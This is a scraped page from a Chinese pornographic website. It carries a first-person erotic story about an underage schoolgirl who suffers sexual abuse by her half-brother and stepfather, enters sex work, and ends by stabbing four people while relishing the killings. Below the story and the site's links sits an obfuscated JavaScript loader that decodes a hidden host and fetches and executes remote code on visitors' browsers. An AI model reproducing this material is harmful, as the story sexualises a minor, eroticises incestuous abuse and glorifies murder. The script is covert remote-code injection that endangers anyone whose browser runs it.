返回

密戏之交欢4b5

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



我的名字叫阿茵,由于成绩不是很好,所以留过一年班,今年还在读。
讲起我的家庭环境就实在太複杂了,自从四岁那年父亲死了,亚妈就带着我嫁给现在的继父,结婚一年后,就为我加添了一个同母异父的小弟。
其实我对这个继父毫无好感,他虽然以开计程车维生,但由于对嫖、赌、饮、吹样样都在行,家庭一直十分清贫,需要母亲外出工作帮补家计。
在我住的这区内,最痛恨就是住在离我们两座的那个亚萍,由于她恃住父亲在黑道有点势力,在我们这屋村就经常作威作福。
但惹起我把火的原因是因为去年母亲偶然在走廊撞倒了她,她硬要母亲付汤药费,而我则极力反对,还与她口角起来,最后她只好悻悻然离去。
本来以为会就此没事,岂料之后在我的家门前,先后被人恶意纵火多次,若非及时发觉,真是后果不堪设想,那知她还未肯收手,更找人打我妈一身伤,本来我真是想去打她,不过妈在声泪俱下的劝止我,只有暂时忍住。
今日放学之后,都好开心,因为在途中遇到威哥,是住在我楼上的一个读预科班男孩子,自从去年他和家人搬来后,我就开始留意,对他暗暗倾慕,难得在回程途中碰见他,可以有段长时间相对,不过可惜不知她对我怎样,究竟会不会喜欢我呢?
今晚父亲又很迟才回来,还喝酒喝得醉昏昏,本来熟睡中的我亦被吵醒,之后更听见他要向母亲求欢,本来不愿听的,无奈被吵醒后不易睡着,听着那些气喘与呻吟的声音,实在感到有点不自然,正在胡思乱想之际,突然感到胸部被人触摸,回头一看,是我那个同母异父的弟弟……
当我发觉触摸我的是弟弟后,只好装作仍在酣睡,转一转身,避开他的禄山之爪,还顺势把手放于一旁,赶走他的骚扰,而他亦似乎害怕再搞下去会把我弄醒,亦离开了我的床边,我在好奇心驱使下,偷偷睁眼看他在做甚么﹖
不看还好,一看之下实在令我又羞又怒,他竟坐在附近自己玩弄起来,说实话,这次才是我第一趟看见男性的东西,儘管感到很不应该,还是忍不住偷看下去……
今天一早醒来感到十分疲倦,因为整晚都在发一些十分荒唐的梦,令到无法睡得较好,在早餐时,弟弟的表情丝毫察觉不出有何不妥,实在令我怀疑在昨晚之前,他是否经常在夜间骚扰我而未被发现?
想到这里实在有点担忧,可恨的是我的房间只以布帘间隔,无法阻止别人进入……
在屋村内,我认为最讨厌的那个亚萍,除了住得近之外,还在同我一间学校,只不过是彼此不同班,可能她对我的印像不是太深,但是每次见她我都想拿把刀劈死她,不过暂时都是省事些,最好她不惹我,否则的话,才不理她父亲在黑道上有甚么势力,肯定和她玩到尽……
放学时候,竟发现威哥在校园外附近徘徊,可能他正在等人而我并没注意,急走上前打招呼并与他闲聊,我明白在弄清楚他对我的感觉前,必须努力争取,我大着胆子对他说,希望明天看一套想看已久的电影,希望他可相陪。
在他未答覆之前,我可感觉自己心跳加速,直至他说没有问题后,我才舒一口气,代之而起的是十分高兴,为免被他发觉我那份雀跃万分的表情,交代了相约之时间地点后,假借有事而先行离开,因我已紧张得手心出汗、呼吸困难了……
每当想起明天与威哥的约会,就开心得由内心笑出来,不知不觉间便回到家中,由于天气实在太热,急不及待地前往洗澡,突然发觉门外人影晃动,以为又是弟弟在门缝偷看,但细看那个人影却不太像,倒有点酷似我的继父……
我在惊惶之下急急穿好衣服出来,只见弟弟正坐于大听上看电视,表情若无其事,而继父竟亦出奇地在房中出现,据他说今天他们二人一早便已在家,假如刚才的人影真的并非弟弟,难道是他?但没理由在偷看我时,弟弟没有发觉的,除非……
太可怕了,实在叫我不敢想下去。
晚间,吃完饭我便上床休息,免得明天往赴威哥的约会时不够精神。睡至半夜,忽然被一种奇怪的感觉弄醒,原来又是我那个好弟弟在对我作出性骚扰,这一趟他更为大胆,竟伸手进我的睡袍内,正沿着大腿不断游移向上。
我本想避开了事,谁不知他竟毫不识趣,双手用力一分,把我双腿拉开,并以手直抵我的敏感地带,第一次被其他人触及那里的感觉,儘管感到很不应该之下,仍带点轻微的兴奋,但在我仍具有清醒意识之下,仍竭力避开他那不规矩的手,并诈作要醒转过来的样子,才总算可以把他吓退。
总算勉强睡至清晨,昨晚一直被一种特别的感觉所骚扰,也许是因为被弟弟触摸过私处的关係而产生一丝幻想,今天吃早餐时,弟弟仍可装得若无其事,反而自己觉得有点尴尬。
千辛万苦终于等到放学,急急奔离校门,走住约定的街角,竟看见我最讨厌的亚萍与威哥在谈话,急走上前与威哥打招呼,还索性倚在他的肩上,亚萍被我突然的出现及举动弄得一呆之际,我索性催促威哥早点出发去看戏。
其用意分明是不给她面子,她似乎亦被我气得面红耳热,因为一向都没有甚么人够胆不给她面子的。
在亚萍悻悻然离去后,我与威哥终于可双双散步住看戏,由于我最关注是可与威哥看戏,故昨日在提及选看那部电影时并未详加考虑,实在想不到内里竟有一大段男女交欢的情慾戏,我正在看得尴尬万分之际,威哥竟伸手过来……
正感手足无措之时,原来他的手只是搭在我的肩上,这一举动令我心里甜丝丝,索性倚于他的肩膊上。
看完电影后,威哥提议往尖东海傍散步,我自然乐意万分,实在想不到竟然可以与威哥像其他情侣一样在海傍散步,兴奋的心情已盖过一切,完全不会对这段感情发展过快而觉意外。
与威哥逛过街及吃过晚饭后,已差不多晚上九时多,回到家中很自然被母亲责骂一番,但这一点我毫不介意,只要有机会与威哥去逛街,纵使多被骂几次又何妨……
由于在日间与威哥约会的关係,在晚上竟迟迟无法入睡,直到午夜时分,意识上开始模糊之际,突然感到有人进了我的房间,偷偷望了一眼,又是常作性骚扰的弟弟,不知为何,今晚竟没有抗拒的意愿。
也许昨晚他弄得我颇为兴奋之故,再加上今天与威哥约会及在电影上看过一段情慾戏的关係,心情比较迷乱,竟不愿阻止弟弟的骚扰……
今晚弟弟比昨晚来得谨慎,起初只是在我的手臂及腿上触摸,直至确认我没甚么反应后,他的手又再次沿着我的腿直抵敏感地带,由于这一次我是故意让他触摸,心情可较专注于被抚摸之感受,我不晓得弟弟是否有过其他经验,但他的爱抚技术的确令我十分满足。
正在享受那一种十分特别的飘飘然之感时,突然觉得口部一紧,原来他竟用口来吻我,正想反抗之时,他已索性整个人压上来,更令我吃惊的是,从大腿的感觉令我知道他竟是脱去裤子的,还想伸手来脱我的内裤。
他的举动令我无法再顾及后果,迅速推开他及给了他一记耳光,在他被推开之际,我还可以看见他是处于十分兴奋的状态,由于弟弟在退开时碰到墙边,发出一些声响,竟吵醒了父母,继父更马上走进来我的房间,这一瞬间,弟弟连裤子也还没穿好……
继父更很快便走了过来,当他看见衣衫不整的我及仍未穿好裤子的弟弟时,表情并未太强烈,只是把弟弟带离我的房间,并以说话把母亲敷衍过去,虽然事情就此解决,但继父临行时的眼神却瞧得我心里发毛。
翌日,由于今天是星期日,无须上学,而我又没甚么娱乐,故此在大白天仍赖在床上。
正在看书看得入迷之际,忽然看见继父在房门出现,从他那色迷迷的目光及我的第六感,我知道会有危险发生,尚未来得及下床,他已扑到我身上,还对我毛手毛脚,我虽极力抵抗及叫喊,但他的气力雄胜我多倍,再加上家中并没其他人,我的呼喊亦显得徒劳无功。
经过多番挣扎的我,已渐渐显得疲倦,继父见我已呈疲态,他的行动就更为放肆,转眼间,他已把我全身的衣服脱去,我还是第一次这样赤条条的面对别人,既尴尬又羞怒,而他更在我面前开始脱裤子。
当我看见那件“东西”时,几呼想叫出来,因为他的比弟弟的大得多,要我容纳它实在困难,但他却不因我害怕的表情而停止,我已看见他渐呈兴奋状态,还朝我而来。
天啊!难道我宝贵的第一次就这样失掉?在这剎那我想起威哥,大概每个人在危难之时都会想到自己喜爱的人吧!
由于在脑际闪过威哥的影子,令我突然产生一种力量,眼看他的东西已準备进攻之际,突然看见床边放的闹钟,拿起就往他的头部打去,而意外地他竟被我这股无情力打得晕了过去,而我亦无暇细想,匆匆穿上衣服就往外逃。
但刚抵大门之际,弟弟竟恰巧在这时回家,我被他这样一阻,继父已穿回衣服,慢慢从房间走出来,而弟弟亦以乎明白是甚么一回事,拦在门前,而继父这次再把我按倒在地上时,我感到真正的绝望……
而弟弟竟出奇地有默契上前协助他,由于之前曾作过一次抵抗,这趟早已没有太多力气反抗,再加上在他俩合力之下,我再度被脱致清光,而这次继父更要强行迫我替他用口服务。
就在快要被迫进行之际,门上传来开锁的声音,继父一惊之下,马上把我整个人抱回房间并穿好裤子,待我略为整顿好衣服出来时,他们竟若无其事地坐在厅中看电视,而母亲正在厨房煮食,看来她回来时,并未发现有何不妥。
继父就在这个时候走来警告我,说假如把这件事说给母亲知道,他决不会放过我,亦会与母亲离婚,免得被她噜囌,这一点倒真的吓倒我,我的安危并不太重要,反而是母亲若因此事而与继父分开,则会令我不安﹗
儘管继父并非一个好丈夫,但我知道母亲十分重视他的。
千辛万苦才吃完那一顿令我尴尬万分的晚饭,急急躲回房中,当我想起假如母亲不在,将会有被他们淫辱的可能时,真是急得想哭,不知不觉间便睡着了。
今早醒来比平日为早,可能是没有受到弟弟骚扰之故,相信他定是认为来日方长,既已表明立场,无须急在一时吧!吃过早餐便急急上学,尽快离开这个充满危机的家。
整日上课也显得心神恍怫,每当想到返家便有被污辱的危险就令我困恼,但天公似乎要玩弄我,今天竟因教师需要开会而比平日更早放学。
正当大家兴高采烈离开校园后,我才在不情不愿下踏着沉重的步伐离开。
甫踏出校门即被四五人所拦阻,原来是亚萍及她的一群“姊妹”,原来她是为了数日前我强行在她面前拖走威哥一事而来找晦气,她要我认错及以伍佰圆来赔偿她损失面子的代价。
由于受继父及弟弟性骚扰的事已十分烦恼,对于她的无理要求索性置之不理,就在她们中间走过,亚萍见我竟在她的姊妹面前这样不给面子,竟强行拉我回来,并在我面上打了一巴掌……
“好哇!妳竟敢打我,亚姐今日心情不好,注定妳倒霉……”
亚萍竟敢在我心情这样不佳下惹我,可谓犯贱,她打完我一巴掌后,正在洋洋自得之际,我突然扑上前捉着她,就往她腹部赠上一拳,再在面部多赏一记耳光,她被我打退之后,场面一度静了下来,大概她们没有一个会想到我竟敢还手吧!
在亚萍一声令下,众人相继扑上,在双拳难敌四手之下,我就这样在街上被亚萍的姊妹按倒地上,可见她真的是恶得交关,几番挣扎下仍无法摆脱众人,而亚萍则目露兇光慢慢走过来,更手持着一个玻璃汽水樽。
她说要我嚐嚐与汽水樽亲热的滋味,一边说一边拉起我的校服裙,这一剎那真的有点害怕,突然听见有人说警察来了,众人不禁停了下来,我就乘着此时起脚踢向亚萍,不偏不倚打中她的下体,她那个痛苦的表情,实在令我印象难忘。
之后由于警察巡经此处,我才终告脱险。
回到家门附近,步伐不禁踌躇起来,在母亲尚未返家之前踏入去,无疑与身入虎穴同样危险,突然背后被人拍了一下,回头一看,竟是威哥……
在附近的公园与威哥散步个多小时后,我竟情不自禁把近日之事对地说出,只见地的反应十分愤怒,声言必须前住报警,好不容易才把他劝服下来,就是因为不想把整件事张扬才一直不敢报警,而威哥亦只有加倍开解我。
不知不觉间,我竟步进了威哥的家,由于他的家人每天晚上都十分夜归,只得我俩共处斗室,威哥的表现十分从容自然,令我反而觉得自己的疑虑有点多余。
当大家坐于客厅看电视时,我的内心十分矛盾,既希望不要有甚么事发生,但内心却又不愿如此平淡渡过这个难得的晚上,想到这里之际,突然感到肩膊一紧,原来威哥把手放了在此,跟着他用力一拉,我完全失去重心扑倒他身上,更被地强吻下来,经过轻度反抗下,我慢慢闭上眼睛,静静的享受这刻,突然感到身体被威哥的手骚扰起来。
“啊……不要这样……”
噢!天亮了!昨晚就是这样把第一次给了威哥,不过我不会感到后悔,因为能把初夜献给心中最爱,可算是每个少女的梦想。
不觉竟在威哥的家中逗留上好多天,原来他上次所述的家人一早已尽往移民,说会夜归只是说谎,看来我亦具足够吸引力令威哥说谎来引诱我哩﹗
经过数日放肆的生活后,还是要硬着头皮返家,照例又被母亲痛骂一番,但最令我气愤的是后父竟亦参与骂的行列,好几次想反驳他亦勉强按捺下来。
由于与威哥的关係已十分亲热,现在每天放学后索性直往威哥的家,待至晚上母亲在家时才回去,既可与威哥相聚,又可避免受到后父及弟弟的骚扰,由于这样,后父似乎因无法找得机会向我埋手而睥气比前更暴躁。
有一天,我去找威哥时,看见他正愁眉苦面,原来他的母亲在外地病倒,急需一笔庞大的医药费,而他又实在没可能筹得足数,所以正为此烦恼,我询问之下才知数额尚差二万多元。
我建议外出工作来帮助筹钱,但他却说不必,因为根本不够时间,他需要在两週内筹足这个数目,试问有甚么工作可在两週内找得二万多元呢!
我看见威哥那一副沮丧的样子时,心里已下了一个决定……
经过一些猪朋狗友的搭路下,第一天上班了,“大家乐夜总会”这个名字我并不喜欢,但以我未满十八岁而出来“做”,则无法挑选那些大规模的,只能躲在油麻地这种小架步。
据负责人权叔说,我要借二万五并非大问题,但却要最少在此工作半年。
为了帮助威哥,甚么条件亦答应下来。
当威哥收到这笔钱时,他已明白到我用甚么方法来筹钱,只有拥抱难过的份儿,并声言我待他如此好,他亦会永远相伴我左右,实在令我的心甜死了……
在回程途中,由于连日感到的不适,前住诊所看看,得出的结果令我手足无措,因为我竟怀孕!
我在得悉怀有威哥的身孕后,在毫无意识下,只好回去徵询威哥的意见,第一时间赶往他的家,就在快抵达之时,距他家门不足三十呎,竟看见我的死对头亚萍出现在威哥家门,还走进威哥的家,被威哥十分热切的款待入内……
我在又惊又怒的心情下悄悄伏在门外偷听,儘管我亦明白此举可听到的不会太多,但仍可听见他们的对话十分亲蜜,想到这,真的想撞门而入,但想到威哥平日对我温柔的模样时,又不禁迟疑起来,也许他亦有自己的苦衷呢……
由于突然遇到这件事情,令我完全没有心情回家,在威哥的门外一等就是三个多小时,当我一想到他们二人在屋内做甚么时,就恨得牙齿打颤。
终于被我看见门开了,亚萍从内从容走出,临行还赠以威哥一吻,看到这样,我再也忍不下那口气,急奔上前把他俩推回屋内,并关上大门。
由于他二人想不到会突然有人扑出,措手不及之下,双双被我推进屋内,当看清是我时,表情更为惊诧,而我亦不理他们的表情变化,只急着向威哥求证整件事的真相,但在威哥仍未答覆时,亚萍已大笑起来,还指着我说,整件事也是由她一手策划,由于我多番不给她面子,而又看出我对威哥有暗恋之意,故此由威哥来进行这样的一套“美男计”,果然令我上当,还顺道骗上一笔金钱,实在令她喜出望外。
听见这一大堆说话时,我的心已完全破碎,心目中唯一值得依赖的威哥,竟是一个被人指使而对我骗财骗色的东西,实在叫我心痛﹗
亚萍说完这番话后便洋洋自得準备步出门口,看见她那副德性,心中的怒火突然涌起,随手拿起桌上的生果刀就住她身上插,当我意识到她的惨叫时,我的刀亦已插中了威哥,我实在恨透了他,我把终生的幸福和希望都寄托在他的身上,他竟然是存心欺骗我,实在叫我容忍不下。
看见二人的尸体倒卧于血泊中时,我感到一种莫名的满足感,因为我可以令欺负我的人不得善终,实在充满快感。
大概因为我满身血污,在回家途中,不少邻居都争相躲避,当我停在家门前时,从声音可辨出后父又在打骂母亲。
我静静的开门,再缓缓的走近母亲的房门,在悄无声色下就赠了后父致命的一刀,当这一刀刺入去的时候,那份满足感比之前两次来得更甚,大概因为杀了他后,不单可报复地对我的欺负,更可免却母亲不断被他打骂﹗
母亲看见我这个样子时,亦吓得目定口呆。
就在此时,我认定要杀的第四人,我弟弟刚好返家,真是天助我也!乘他步过房门时就刺上他一刀,岂枓这一刀未能顺利致命,只能划伤他的手臂,当我再加以追击时,他已能回身挡架。
就这样,我们二人在屋内追追逐逐,直至把他赶至骑楼时,我认定他已必死,竟被他脚下一绊,把我摔了出去,我在这一刻只能做到的一件事就是捉着他,令他和我一起从二十三搂掉下……
弟弟直堕楼下,我则挂在二十二楼的晾衫架,如果不是昏过去,我一定会跟他去﹗
我没让自己的孩子在狱中出世,没啥说的,我不愿我的命运在儿女身上重演﹗


评分
相关推荐
3.0分

3.0分 密戏之交欢-乱伦小说baf

3.0分

3.0分 大学生交换女友之别墅狂欢50c

3.0分

3.0分 密室逃脱游戏632

3.0分

3.0分 女人喜欢的前戏d41

3.0分

3.0分 我好喜欢SM游戏8c5

3.0分

3.0分 公车!密戏的天堂!843

3.0分

3.0分 湿之欢颜adb

3.0分

3.0分 湿之欢颜adb

3.0分

3.0分 钢琴之欢8c7

3.0分

3.0分 《湿之欢颜》37d

3.0分

3.0分 湿之欢颜adb

3.0分

3.0分 乾妈和少年的密戏3f2

3.0分

3.0分 夫妻交换游戏748

3.0分

3.0分 11、鱼水之欢e8f

3.0分

3.0分 妈妈是AV女星之试戏7ff

3.0分

3.0分 女友小美之触手游戏b2e


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};